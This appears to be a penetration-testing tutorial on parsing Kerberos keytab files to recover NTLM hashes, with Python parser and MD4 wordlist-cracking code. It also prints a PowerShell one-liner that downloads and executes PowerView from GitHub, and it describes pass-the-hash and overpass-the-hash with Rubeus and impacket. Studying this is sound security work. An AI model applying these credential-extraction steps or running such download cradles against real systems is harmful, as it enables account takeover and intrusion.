Extracting NTLM Hashes from keytab files

Overview

If you’ve ever performed an engagement in a network with Linux boxes joined to an Active Directory domain, you have probably stumbled across keytab files. You may have thought nothing of them, but in reality they’re a great resource for attackers because there’s a good chance they contain NTLM hashes: when a keytab entry uses the RC4-HMAC encryption type, the key stored in it is the account’s NT hash. I have seen few resources on keytab files, so I’ve decided to write a post showing how to interpret them and how you might use them on an engagement should you come across them.

What Are Keytab files?

In short, keytab files let a Linux box (or any other Kerberos client or service) authenticate to Kerberos without an interactive password. They contain Kerberos principals together with their long-term keys, which are used to request or validate tickets. Many people open a .keytab file, see what appears to be nonsense, and think nothing of it; however, these keys are derived directly from the account password, so a keytab is just as sensitive as a password or a private key and should be protected accordingly (on a typical host, /etc/krb5.keytab is readable only by root for that reason).

Opened in a text editor, a keytab doesn’t look like much. The structure of keytab files is documented [ HERE ]. Opening the file in a hex editor makes a bit more sense of it and is easier to work with.

Interpreting the Data

To make it easier to understand and parse, let’s view the file as hex (Sublime Text will do this for a binary file) and follow along with the documented file format to see how it is structured.

Here I’ve broken the file into smaller chunks to represent the data structure as per the documentation.

0502 – 16 bit value representing the keytab file format version (0x0502, i.e. version 2; all integers in a version 2 keytab are big-endian).
0000 0047 – 32 bit value giving the length of the entry that follows, i.e. how many bytes belong to this entry. 0x47 is hexadecimal for 71, so the next 71 bytes are one entry. Note that the entry begins with a 16 bit number-of-components field (0x0002 here, since the principal http/test1.soslab.local has two components); it is not broken out in the dump below, which is why the fields listed add up to 69 bytes rather than 71.
000c 736f 736c 6162 2e6c 6f63 616c – 16 bit value stating how many bytes will follow (0x000c is 12 in decimal), followed by the bytes of the realm. soslab.local is 12 bytes in this example.
0004 6874 7470 – 16 bit value stating how many bytes make up the first component of the principal (4 in this case), followed by the corresponding bytes (http in this example, the service class of the SPN).
0012 7465 7374 312e 736f 736c 6162 2e6c 6f63 616c – 16 bit value stating how many bytes make up the remaining component of the principal. Again, 0x0012 is hexadecimal, so the decimal value is 18. The 18 bytes that follow spell test1.soslab.local, the host part of the SPN.
0000 0000 – 32 bit value representing the principal name type (0, NT-UNKNOWN, in this case).
0000 0000 – 32 bit value representing the timestamp (a Unix time; 0 here, which usually means the keytab was generated by a tool that did not record one).
04 – 8 bit value representing the key version number (kvno) of the key. This must match the kvno of the account’s current password for the key to be accepted.
0017 – 16 bit value stating the encryption type (0x17 = 23, RC4-HMAC, in this case). AES keys would show as 0x0011 (17, AES128) or 0x0012 (18, AES256).
0010 8955 1acf f889 5768 e489 bb30 54af 94fd – 16 bit value stating how many key bytes will follow (0x0010 is 16 in decimal), followed by the key itself. For RC4-HMAC the key is MD4 of the UTF-16LE password, which is exactly the NTLM (NT) hash: 89551acff8895768e489bb3054af94fd.
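Walking the structure by hand is fine once, but a parser makes the layout concrete. The following is an added example in Python 3 (my code, not the script linked later in this post or anything from the MIT/Heimdal projects) that parses the version 2 keytab layout described above. The sample bytes are reconstructed from the dump, with the 16 bit number-of-components field (0x0002) that the format places after the entry length restored so the entry really is 71 bytes; the encryption type table, the handling of deleted (negative-length) entries and the optional trailing 32 bit kvno follow the documented format, and it goes a little beyond the dump by handling multi-entry files.

```python
import struct

# Constructed sample: the bytes from the dump above, reassembled into a complete
# file. The 0x0002 number-of-components field is restored between the entry
# length and the realm; everything else is exactly what the dump shows.
SAMPLE_KEYTAB = bytes.fromhex(
    "0502"                                   # file format version 2
    + "00000047"                             # entry length: 0x47 = 71 bytes
    + "0002"                                 # principal has two components
    + "000c" + b"soslab.local".hex()         # realm
    + "0004" + b"http".hex()                 # component 1 (service class)
    + "0012" + b"test1.soslab.local".hex()   # component 2 (host)
    + "00000000"                             # name type 0 = NT-UNKNOWN
    + "00000000"                             # timestamp
    + "04"                                   # 8-bit key version number
    + "0017"                                 # enctype 23 = rc4-hmac
    + "0010" + "89551acff8895768e489bb3054af94fd"  # 16-byte key (NT hash)
)

# IANA Kerberos encryption type numbers for the types seen in AD keytabs.
ENCTYPES = {
    1: "des-cbc-crc", 3: "des-cbc-md5", 16: "des3-cbc-sha1",
    17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
    19: "aes128-cts-hmac-sha256-128", 20: "aes256-cts-hmac-sha384-192",
    23: "rc4-hmac",
}


def _counted(buf, off):
    """Read a 16-bit big-endian length followed by that many bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    if off + n > len(buf):
        raise ValueError("counted octet string runs past end of entry")
    return bytes(buf[off:off + n]), off + n


def parse_entry(entry):
    """Parse one version 2 keytab entry (the bytes after the 32-bit length)."""
    off = 0
    (ncomp,) = struct.unpack_from(">H", entry, off)
    off += 2
    realm, off = _counted(entry, off)
    comps = []
    for _ in range(ncomp):
        comp, off = _counted(entry, off)
        comps.append(comp.decode())
    name_type, timestamp = struct.unpack_from(">II", entry, off)
    off += 8
    kvno = entry[off]
    off += 1
    (etype,) = struct.unpack_from(">H", entry, off)
    off += 2
    key, off = _counted(entry, off)
    # Optional trailing 32-bit kvno: present if 4 bytes remain, and it
    # overrides the 8-bit vno when non-zero.
    if off + 4 <= len(entry):
        (kvno32,) = struct.unpack_from(">I", entry, off)
        if kvno32:
            kvno = kvno32
    return {
        "principal": "/".join(comps) + "@" + realm.decode(),
        "name_type": name_type, "timestamp": timestamp, "kvno": kvno,
        "etype": etype, "etype_name": ENCTYPES.get(etype, f"unknown({etype})"),
        "key": key,
    }


def parse_keytab(data):
    """Return a list of entry dicts from a version 2 (0x0502) keytab."""
    if data[:2] != b"\x05\x02":
        raise ValueError("only keytab format version 2 (0x0502) is handled")
    off, entries = 2, []
    while off + 4 <= len(data):
        # The length is signed: a negative value marks a deleted slot whose
        # bytes are still on disk (and may still hold a usable key).
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size < 0:
            off += -size
            continue
        if size == 0:
            break
        entries.append(parse_entry(data[off:off + size]))
        off += size
    return entries


def ntlm_hashes(entries):
    """(principal, hex key) for every rc4-hmac entry: that key *is* the NT hash."""
    return [(e["principal"], e["key"].hex()) for e in entries if e["etype"] == 23]


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_KEYTAB
    for e in parse_keytab(data):
        print(f"{e['principal']} kvno={e['kvno']} {e['etype_name']} key={e['key'].hex()}")
```

Run it with a real keytab as the first argument or with no argument to parse the reconstructed sample. Deleted entries are skipped here rather than parsed, but their bytes are still in the file; if you are doing forensics on a keytab, parsing the negative-length slots as well can turn up keys from an earlier kvno.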

Going On The Offensive

We’ve recovered an NTLM hash, which is great, but we don’t know yet which user account it belongs to. What we do know is the SPN associated with the key: http/test1.soslab.local. Using PowerView, we can list the domain users that have SPNs registered with the following cradle: iex (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Get-NetUser -SPN (the master branch of PowerView uses Get-NetUser; the rewritten dev branch names the same query Get-DomainUser -SPN).

The output shows that the SPN is registered on a user account named KeySrvc. With that knowledge we can do a number of things with the NTLM hash, such as cracking it offline (hashcat mode 1000) or performing pass-the-hash / overpass-the-hash attacks as KeySrvc. One caveat: only RC4-HMAC (etype 23) keys are NT hashes. If the keytab holds AES keys (etypes 17 and 18) instead, they are salted PBKDF2 derivations of the password and cannot be cracked as NTLM, but they can still be used for overpass-the-hash with tools that accept AES keys (Rubeus asktgt /aes256, or impacket’s -aesKey option).
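Cracking an rc4-hmac key offline is just recomputing the NT hash (MD4 over the UTF-16LE password) of each candidate and comparing it to the key. The following added example (my code, not from the original post) does that check against the key from the dump above with a constructed wordlist. It carries its own MD4, since hashlib's md4 is frequently unavailable under OpenSSL 3, and it makes the caveat from the previous paragraph explicit: the check only applies to etype 23 keys, because AES keys are salted PBKDF2 derivations rather than NT hashes.

```python
import struct

MASK32 = 0xFFFFFFFF

# Key from the dump above, and a constructed wordlist for the demonstration.
KEYTAB_KEY = "89551acff8895768e489bb3054af94fd"
WORDLIST = ["password", "Password1", "Welcome1", "Summer2023!", "KeySrvc2019"]


def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), enough to compute NT hashes offline."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476

    # (mixing function, additive constant, word order, per-step shifts)
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for i in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[i:i + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for step, idx in enumerate(order):
                a = rol((a + fn(b, c, d) + X[idx] + k) & MASK32, shifts[step % 4])
                a, b, c, d = d, a, b, c   # rotate registers for the next step
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), which is also the rc4-hmac Kerberos key."""
    return _md4(password.encode("utf-16-le")).hex()


def crack_rc4_key(key_hex, candidates, etype=23):
    """Return the candidate whose NT hash equals the keytab key, or None.

    Only rc4-hmac (etype 23) keys can be checked this way. AES keys
    (etypes 17/18) are PBKDF2-SHA1 derivations of the password with a
    realm+principal salt, so an NT-hash comparison is meaningless for them."""
    if etype != 23:
        raise ValueError(f"etype {etype} key is not an NT hash; use pass-the-key instead")
    target = key_hex.lower()
    if len(target) != 32:
        raise ValueError("rc4-hmac keys are 16 bytes")
    for pw in candidates:
        if nt_hash(pw) == target:
            return pw
    return None


if __name__ == "__main__":
    hit = crack_rc4_key(KEYTAB_KEY, WORDLIST)
    print(f"{KEYTAB_KEY}: {hit if hit else 'not in wordlist'}")
```

For anything beyond a handful of candidates use hashcat mode 1000 on the hex key; this block exists to show that the key recovered from the keytab really is the same value hashcat expects, not to replace a real cracker.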

Python Script for Hash Extraction

Sifting through raw bytes is nobody’s idea of a good time, so I wrote a little Python 3 script to do the heavy lifting: it walks the entries and prints each principal, kvno and encryption type along with the hex key. You can find the repo [ HERE ].

Resources